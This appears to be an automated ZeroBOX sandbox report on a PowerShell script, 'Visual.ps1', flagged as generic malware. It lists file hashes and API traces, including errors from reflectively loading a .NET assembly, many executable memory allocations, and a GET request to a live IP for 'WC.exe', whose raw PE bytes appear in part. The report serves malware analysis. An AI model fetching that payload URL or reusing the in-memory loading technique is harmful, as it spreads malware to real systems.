popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Visual.ps1

Generic Malware Antivirus
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6402 Aug. 10, 2024, 5:40 p.m. Aug. 10, 2024, 5:42 p.m.
Size 4.8KB
Type ASCII text, with very long lines, with CRLF line terminators
MD5 0ceeb6420f475c07ac5f4b4783855400
SHA256 5f84626e7e1287f88edad1ff303ad65fb39bbc710a0cda8f5e5d6e3c7e883851
CRC32 34FC97A0
ssdeep 96:W7aa/WFrQxrzcZVxmKdSt4V2X4tStpr4Rk0QPRav:W//srQx/cZVxmKdG4V2XmGprAzQ5k
Yara None matched

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
147.45.44.131 Active Moloch
164.124.101.2 Active Moloch

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: Exception calling "Load" with "1" argument(s): "Could not load file or assembly
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: '13312 bytes loaded from System.Management.Automation, Version=1.0.0.0, Cultur
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: e=neutral, PublicKeyToken=31bf3856ad364e35' or one of its dependencies. An atte
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: mpt was made to load a program with an incorrect format."
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: At line:7 char:47
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: + $assembly = [System.Reflection.Assembly]::Load <<<< ($fileBytes)
console_handle: 0x0000005f
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x0000006b
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x00000077
1 1 0

WriteConsoleW

 buffer: You cannot call a method on a null-valued expression.
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: At line:13 char:19
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: + $entryPoint.Invoke <<<< ($null, $params)
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : InvalidOperation: (Invoke:String) [], RuntimeExc
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: eption
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : InvokeMethodOnNull
console_handle: 0x0000005f
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x008284d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 8
1 1 0

CryptExportKey

 buffer: f ¤42ÑhÅ<p×뿶6E—Ue6XýÄâ¯yûÞ
crypto_handle: 0x008284d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 8
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00828658
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00828658
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00828658
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00828658
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00828658
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00828658
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://147.45.44.131/files/WC.exe
request GET http://147.45.44.131/files/WC.exe
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 3036
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ab000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3036
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ff000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3036
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02649000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3036
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05650000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3036
region_size: 327680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3036
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3036
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3036
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef30000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3036
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef30000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3036
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05651000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3036
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06030000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3036
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02902000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3036
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02903000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3036
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026f9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3036
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05446000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3036
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05447000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3036
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05652000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3036
region_size: 2293760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06760000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3036
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06950000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3036
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06951000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3036
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06952000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3036
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06953000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3036
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06954000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3036
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05653000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3036
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05654000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3036
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05655000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3036
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05656000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3036
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05448000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3036
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05657000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3036
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05431000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3036
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06031000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
Data received HTTP/1.1 200 OK Date: Sat, 10 Aug 2024 08:40:40 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Wed, 07 Aug 2024 18:11:09 GMT ETag: "3400-61f1bd5b0085b" Accept-Ranges: bytes Content-Length: 13312 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELYÞy™à" 0*JI `@  `…öHO`Œ€ `H8  H.textP) * `.rsrcŒ`,@@.reloc €2@B*IHh)ø07( }}}|(+|( *( *.s €*ªrp( -r p( -+ rp*r‰p**( *0/( }}|(+|( *( *0(o ( *ÎÐ&(! rËp(" %¢%Œ(¢o# ¥**ÎÐ&(! rÛp(" %¢%Œ(¢o# ¥(*0yÐ&(! ($ +  +Všo% rëp( ,>šo& šo' o% rýp( ,š%Œ(¢o# t X Ži2¤*0k %%r p¢%rp¢%r'p¢%rAp¢%rmp¢%rp¢%r»p¢%rÝp¢%rûp¢% r!p¢% rEp¢% rop¢*Ž( (Ð(! (( ¥*0 ™ 8Š þþÐ(! () (* }~ rp~+ ~+  ~+ o>-s, z<( 2XX(  ³( ž(- 3~ {o*- s, z~ {o&-s, z)”~  {Xo6-s, z3~  {o:,s, zPX(  TX(   ~ { 0@o.  -s, z~ {  o2-s, z øX X( 80Ð(! rÛp(" %¢%  XŒ(¢o# ¥(Ð(! rÛp(" %¢% XŒ(¢o# ¥(Ð(! rÛp(" %¢% XŒ(¢o# ¥(,w+Ð2(! rp(" %¢%Œ(¢%¢%Œ(¢%ŽiŒ(¢o# &~ { XŽio2-s, z (X X?Çþÿÿ ( ~ {Xo2-s, z(X(  , , Xž(- 3~ {o"- s, z~ {o-s, z~ {o3s, zÞ#& {(. (/ o0 ÞX ?oüÿÿ*A4Au( *0ô( š( š(+€( š( š(+€( š( š(+€( š( š(+€( š( š(+€( š( š(+€( š( š( +€( š(  š( +€ ( š(
Data received
Data sent GET /files/WC.exe HTTP/1.1 Host: 147.45.44.131 Connection: Keep-Alive
host 147.45.44.131
Time & API Arguments Status Return Repeated

send

 buffer: GET /files/WC.exe HTTP/1.1 Host: 147.45.44.131 Connection: Keep-Alive
socket: 1588
sent: 75
1 75 0
Time & API Arguments Status Return Repeated

recv

 buffer: HTTP/1.1 200 OK Date: Sat, 10 Aug 2024 08:40:40 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Wed, 07 Aug 2024 18:11:09 GMT ETag: "3400-61f1bd5b0085b" Accept-Ranges: bytes Content-Length: 13312 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELYÞy™à" 0*JI `@  `…öHO`Œ€ `H8  H.textP) * `.rsrcŒ`,@@.reloc €2@B*IHh)ø07( }}}|(+|( *( *.s €*ªrp( -r p( -+ rp*r‰p**( *0/( }}|(+|( *( *0(o ( *ÎÐ&(! rËp(" %¢%Œ(¢o# ¥**ÎÐ&(! rÛp(" %¢%Œ(¢o# ¥(*0yÐ&(! ($ +  +Všo% rëp( ,>šo& šo' o% rýp( ,š%Œ(¢o# t X Ži2¤*0k %%r p¢%rp¢%r'p¢%rAp¢%rmp¢%rp¢%r»p¢%rÝp¢%rûp¢% r!p¢% rEp¢% rop¢*Ž( (Ð(! (( ¥*0 ™ 8Š þþÐ(! () (* }~ rp~+ ~+  ~+ o>-s, z<( 2XX(  ³( ž(- 3~ {o*- s, z~ {o&-s, z)”~  {Xo6-s, z3~  {o:,s, zPX(  TX(   ~ { 0@o.  -s, z~ {  o2-s, z øX X( 80Ð(! rÛp(" %¢%  XŒ(¢o# ¥(Ð(! rÛp(" %¢% XŒ(¢o# ¥(Ð(! rÛp(" %¢% XŒ(¢o# ¥(,w+Ð2(! rp(" %¢%Œ(¢%¢%Œ(¢%ŽiŒ(¢o# &~ { XŽio2-s, z (X X?Çþÿÿ ( ~ {Xo2-s, z(X(  , , Xž(- 3~ {o"- s, z~ {o-s, z~ {o3s, zÞ#& {(. (/ o0 ÞX ?oüÿÿ*A4Au( *0ô( š( š(+€( š( š(+€( š( š(+€( š( š(+€( š( š(+€( š( š(+€( š( š( +€( š(  š( +€ ( š(
received: 2720
socket: 1588
1 2720 0